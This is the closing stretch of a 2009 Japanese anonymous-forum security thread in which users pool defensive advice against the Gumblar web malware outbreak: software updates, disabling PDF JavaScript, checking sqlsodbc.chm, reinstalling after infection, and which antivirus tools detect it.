　　　　驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明
【確認手段】「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック後、再起動
【結果】ウイルスの検出無し、再起動は正常、CPU使用率も正常、MS-DOSプロンプト、regedit起動可能
973 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:03:47 ]: １．Adobe Flash Player のアップデート
２．Adobe Acrobat Reader のアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript OFF
５．危険IPのブロック
974 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:06:49 ]: ネットがリアルに浸入してきたんだ！
975 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 14:06:51 ]: >>XP / 2000 の方は sqlsodbc.chm をチェックしてください。

この sqlsodbc.chm ってVISTAにもあるがスルーでいいのか？

格納されてる場所は違うけども
976 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:07:41 ]: テンプレ完成したらまとめwikiに貼っておこうよ
次スレまでに状況変わるにしても叩き台にはなるし
977 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:10:12 ]: >>972
お前はもう黙ってろｗ
978 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:11:41 ]: おつー
ひととりＯＫかな？

Meの人はあきらめてくださいｗ
979 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:11:42 ]: 一応大体のものは貼ってきた
被った人すみません。>>966
980 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:14:06 ]: まとめサイト>>129
981 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:16:09 ]: >>970
これで良いかな？

pc11.2ch.net/test/read.cgi/sec/1242363241/12
982 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:16:59 ]: ＞＞199関連も必要なのかな
983 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:17:44 ]: >>980
すまん入れていなかったので今テンプレ続きにした
984 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:21:33 ]: プリフェッチ機能を無効　
でググったらＩＥもできるみたいだけど、やったほうがいいんかね
985 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:22:07 ]: 落ち着いたみたいなので質問

感染した場合、ワクチンやM$のパッチじゃ回復できないの？
986 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:24:02 ]: >>985
感染してたら、今のところ
クリーンインストール&各種PASS変更　推奨
987 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:24:51 ]: >>986

ありがとう
やっぱりそうか…やばいね
988 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:26:11 ]: gumblar.cn の検索結果約 84,200 件中 1 - 10 件目 (0.10 秒)
989 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:26:24 ]: >>968
javaは見つかったが
「PDFをブラウザに表示｣の項目がどこかわからない
990 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:27:29 ]: >>989
確かインターネットの下。
俺はreaderいれてないから確認できないすまん
991 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:28:07 ]: >>986
感染しているかどうかは、どうやって判定すれば良いの？
992 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:28:34 ]: 環境設定→インターネット→Webブラウザオプション
993 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:28:40 ]: >>991
pc11.2ch.net/test/read.cgi/sec/1242363241/12
994 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:30:34 ]: 検出してくれるセキュリティソフトも追加しないか？
付け焼き刃だけど

　・Avast!
　・Kaspersky
995 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:33:47 ]: >>994
こんな感じでいいのかな？

現時点で確認出来る対策ソフト　
・Avast!

・Kaspersky
996 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:33:55 ]: 　・ウイルスバスター2009

もかな

ソースネクストとかのはやばそうだなｗ
997 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:34:40 ]: >>991
sqlsodbc.chmのファイルサイズとMD5をチェック
998 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:34:44 ]: どんどん亜種が出てるみたいから対策ソフトも追いついてない
999 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:35:21 ]: >>995

※亜種の進化が速いため過信は禁物

とか書いたほうがいいかも
1000 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 14:35:37 ]: アンラボも対応済みらしいけど・
1001 名前：１００１ [Over 1000 Thread]: このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef